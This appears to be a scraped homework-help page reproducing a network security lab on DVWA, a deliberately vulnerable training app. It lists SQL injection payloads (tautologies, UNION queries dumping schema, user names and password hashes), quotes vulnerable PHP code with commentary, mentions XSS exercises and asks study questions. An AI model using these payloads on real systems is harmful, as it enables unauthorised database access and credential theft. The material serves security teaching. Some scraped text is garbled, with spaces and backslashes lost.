Answered step by step

Verified Expert Solution

Link Copied!

Question

1 Approved Answer

Posted on Nov 30, 2022

I need help with these network security question, please answeryour own version and below is the instruction. Dam Vulnerable Web App (DVWA) is a PHP/MySQL

I need help with these network security question, please answeryour own version and below is the instruction.

“Dam Vulnerable Web App (DVWA) is a PHP/MySQL web applicationthat is dam vulnerable. Its main goals are to be an aid forsecurity professionals to test their skills and tools in a legalenvironment, help web developers better understand the processes ofsecuring web applications and aid teachers/students to teach/learnweb application security in a classroom environment.”

TASK 1. Setup and prepare to use DWVA

**USE DWVA running in Metasploitable (simplest)

*Use DWVA Live CD (Go to https://github.com/ethicalhack3r/DVWAand scroll to Download section to find DVWA LiveCD - Download ISO )and boot from it on any virtual machine. (Connect the ISO to theCDROM on the VM and check the LiveCD option so you can easily bootfrom the CD rather than the image. This method can even work with anew VM that has no OS installed. )

Optionally, install and run DWVA from your Kali Linux (seekinstructions elsewhere) DWVA user is admin; Password is“password”.

Set VM network to bridged and check that cable is connected inthe advanced configuration. View IP Addresses and ping between yourhost and the VM.

After Metasploitable or the LiveCD boots you’ll see a $prompt.

Use ifconfig to find system ip address
From host computer’s browser load http:///dvwa/login.php andUse
[admin/password]
Read as much of the information about DWVA as time allows;
Select Setup and [Create / Reset Database] — you should seesuccess
messages;
Select DVWA Security — to change the security level to low.

TASK 2. SQL Injection

(From the menu options on the left side of the screen, selectSQL Injection)

Set Security level to low

A. Select SQL Injection button and you will be presented with aUser ID: entry form. In the input box try simply typing 1 and notethe results. (Experiment to see if you can find other details).

Try %'or'0'='0(notetheresults.WhatdoyouthinktheunderlyingSQLstatement is? For example, SELECT first_name, . . . ).
Try 1’ or 0=0 union select null, version() # (results?).

Try the following and see if additional information can begathered from this database:

1. 1’ or 0=0 union select null, user() #
2. 1’ or 0=0 union select null, database() #
3. 1’ and 1=0 union select null, table_name frominformation_schema.tables #

4. %' and 1=0 union select null, table_name frominformation_schema.tables where table_name like 'user%'#

5. %' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columnswhere table_name = 'users' #

6. 1’ and 1=0 union select null,concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) fromusers #

B. Set Security level to medium

Change the DVWA Security level to medium and try a few of theseexperiments again to see whether these attacks might still revealinformation. Try removing the single quote after the initialcharacter.

If we look under the hood at the code in medium it looks likethis:

$id = $_GET['id'];
$id = mysql_real_escape_string($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id =$id";

(The following insights are fromhttp://www.securityclown.com/dvwa-sql-injection/ : The improvementsare in a new function mysql_real_escape_string($id); “What doesmysql_real_escape_string($id); do? According tohttp://php.net/manual/en/function.mysql-real-escape-string.php it“prepends backslashes to the following characters: x00, , r, ,‘, ” and x1a.”

It prepends a backslash, “”, to the list of characters, whichcauses them to be escaped from it’s normal value or meaning. Forexample, in most scripting languages, if we have string mystring ="Hello "World"!" a typical interpreter will

throw an error because of the nested quotes. However, if wechange the string to mystring = "Hello "World"!" mostinterpreters will escape the quotes with the backslash prependingthem and the quotes will then be considered part of the string (andthe backslashes will be excluded). So if you were to print thevalue of mystring = "Hello "World"!" to a console, the outputwould be Hello "World"!.

What does this mean for us? Well, not much.mysql_real_escape_string() is ancient and doesn’t do nearly enoughto slow down an attacker (by itself anyway). There’s plenty we cando without using null bytes, new lines (and it doesn’t escape0x0a), or quotes.

We can remove the single quote from 1' in our queries and almosteverything still works fine.” )

C. Set Security level to high

Let’s cheat and take a peek at the code: $id =$_GET['id'];
$id = stripslashes($id);
$id = mysql_real_escape_string($id); if (is_numeric($id)) {

$getid = "SELECT first_name, last_name FROM users WHERE user_id= '$id'";

(Insights from http://www.securityclown.com/dvwa-sql-injection/:

“Right away we can see two changes. First is the additionalfunction stripslashes($id); and second is the condition if(is_numeric($id)) {.

First let’s take a look at stripslashes($id);. As the name wouldimply, stripslashes() strips away backslashes found in a stringpassed to it (though in the case of double backslashes “” onlyone is stripped leaving “”). A reference to this function can befound at http://php.net/manual/en/function.stripslashes.php. Thisfunction is also ancient, and doesn’t do much in terms of offeringany security.

And now let’s look at the conditional if (is_numeric($id)) {.Here the code is checking the value of $id and making sure that itis a number with the is_numeric() function. If it’s a number, thequery is submitted, if not, no dice.

So what’s vulnerable? Nothing. It’s not vulnerable to SQLinjection anyway.”)

TASK 3. Cross Site Scripting (XSS)

Connect to DVWA on the VM from the host as you did earlier.Select the XSS button and follow the final link to cgisecurity.comand read as much of the info as you have time for.
Follow the examples provided in Chandel “XSS Exploitation in DVWA(Bypass All Security).pdf”

Q1. Why does %' or '0'='0 work against the user login form?

Q2. Why do any of these attacks work against this databaseform?

Q3. When you changed the security level from low to medium, wereyou still able to get any information using SQL Injection?

Q4. As an ethical hacker, when you discover that an exposeddatabase is vulnerable, what should you do with thatinformation?

Q5. Write your own definition of XSS.
Q6. Can high security be by-passed with both SQL Injection and XSS?Explain.